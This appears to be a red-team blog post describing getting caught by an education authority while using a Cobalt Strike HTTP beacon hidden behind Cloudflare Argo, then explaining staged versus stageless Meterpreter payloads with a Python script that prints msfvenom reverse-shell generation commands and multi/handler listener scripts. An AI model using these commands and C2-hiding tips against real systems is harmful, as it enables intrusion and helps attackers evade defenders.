Apt


Never Use the HTTP Protocol in Real Operations

I used Cobalt Strike's HTTP listener for the callback and got caught by the Education Bureau: only a few minutes after the beacon came online, the Education Bureau was already on the phone. Luckily, I had put a layer of Cloudflare Argo in front.

An HTTP beacon's check-ins travel in cleartext, so their URIs, headers and timing can be matched directly by network monitoring on the target side; fronting the listener with Cloudflare Argo hides the team server's real address, but it does not change what the victim network sees on the wire.

The Difference Between meterpreter/reverse_tcp and meterpreter_reverse_tcp

```
payload/windows/x64/meterpreter/reverse_tcp    normal  No  Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse TCP Stager
payload/windows/x64/meterpreter_reverse_tcp    normal  No  Windows Meterpreter Shell, Reverse TCP Inline x64
```

The difference is that the first is a staged payload and the second is stageless. In Metasploit's naming, a `/` between the stage and the transport (meterpreter/reverse_tcp) marks a staged payload: what gets delivered is only a small stager that connects back, and the handler then sends the full Meterpreter over that connection (the listing calls it a "Stager"). An `_` (meterpreter_reverse_tcp) marks a stageless, or "Inline", payload: the whole Meterpreter is embedded in the generated file, so it is far larger but needs no second download, and the listener only has to accept the session. In both cases the handler's `set payload` must name exactly the payload that was generated.
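As an added example (not code from the original post), the following Python script parses payload listings in the shape shown above, classifies each entry with the `/` versus `_` naming rule, cross-checks that against the "Stager"/"Inline" wording in the description, and prints the matching msfvenom command and multi/handler resource script for each. The listing text is constructed from the two entries above, and LHOST 10.0.0.5 / LPORT 4444 are placeholders, not real infrastructure.

```python
"""Staged vs stageless Metasploit payloads: classify entries from a payload
listing and build the matching msfvenom / handler commands.
Added example, not from the original post; the sample listing is constructed."""
import re
from dataclasses import dataclass
from typing import List

# Constructed sample: the two entries discussed above, in the column layout
# the page shows (name, rank, check, description).
SAMPLE_LISTING = """\
payload/windows/x64/meterpreter/reverse_tcp    normal  No  Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse TCP Stager
payload/windows/x64/meterpreter_reverse_tcp    normal  No  Windows Meterpreter Shell, Reverse TCP Inline x64
"""

# The "payload/" prefix is optional: msfconsole's `show payloads` prints it,
# `msfvenom -l payloads` does not.
LINE_RE = re.compile(r"^(?:payload/)?(\S+)\s+(\S+)\s+(Yes|No)\s+(.+?)\s*$")
TRANSPORT_RE = re.compile(r"^(reverse|bind)_")


@dataclass
class Payload:
    name: str          # what goes after -p / `set payload`
    rank: str
    check: bool
    description: str

    @property
    def staged(self) -> bool:
        """Naming rule: staged payloads spell stage and stager as separate path
        components (meterpreter/reverse_tcp), so the last component is just the
        transport; stageless ones join them with '_' (meterpreter_reverse_tcp)."""
        last = self.name.rsplit("/", 1)[-1]
        return TRANSPORT_RE.match(last) is not None

    def description_agrees(self) -> bool:
        """Cross-check the name rule against the listing text: staged entries
        are described as a 'Stager', stageless ones as 'Inline'."""
        if "Stager" in self.description:
            return self.staged
        if "Inline" in self.description:
            return not self.staged
        return True   # singles such as windows/exec say neither


def parse_listing(text: str) -> List[Payload]:
    """Parse listing lines; header and separator lines simply do not match."""
    payloads = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            name, rank, check, desc = m.groups()
            payloads.append(Payload(name, rank, check == "Yes", desc))
    return payloads


def msfvenom_cmd(p: Payload, lhost: str, lport: int, out: str) -> str:
    """Generate a Windows EXE for this payload. A staged payload produces only
    the small stager; a stageless one embeds all of Meterpreter, so the file is
    much larger but never fetches a second stage."""
    return f"msfvenom -p {p.name} LHOST={lhost} LPORT={lport} -f exe -o {out}"


def handler_rc(p: Payload, lhost: str, lport: int) -> str:
    """Resource script for the listener. The handler payload must match the
    generated payload exactly: for a staged payload the handler is what serves
    the stage; for a stageless one it only has to accept the session."""
    return "\n".join([
        "use exploit/multi/handler",
        f"set payload {p.name}",
        f"set LHOST {lhost}",
        f"set LPORT {lport}",
        "exploit -j",
    ])


if __name__ == "__main__":
    LHOST, LPORT = "10.0.0.5", 4444      # placeholders, not real infrastructure
    for p in parse_listing(SAMPLE_LISTING):
        kind = "staged" if p.staged else "stageless"
        print(f"{p.name}: {kind} (description agrees: {p.description_agrees()})")
        print("  " + msfvenom_cmd(p, LHOST, LPORT, f"{kind}.exe"))
        print("  " + handler_rc(p, LHOST, LPORT).replace("\n", "\n  "))
```

Save the printed `use exploit/multi/handler` block as a `.rc` file and start it with `msfconsole -r handler.rc`; the one thing to take from the script is that the `set payload` line must be the same string that was passed to `msfvenom -p`, because for a staged payload the handler is the component that delivers the rest of Meterpreter.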


Apt
https://tokisaki.top/blog/apt/
Author
Tokisaki Galaxy
Published
30 October 2021
License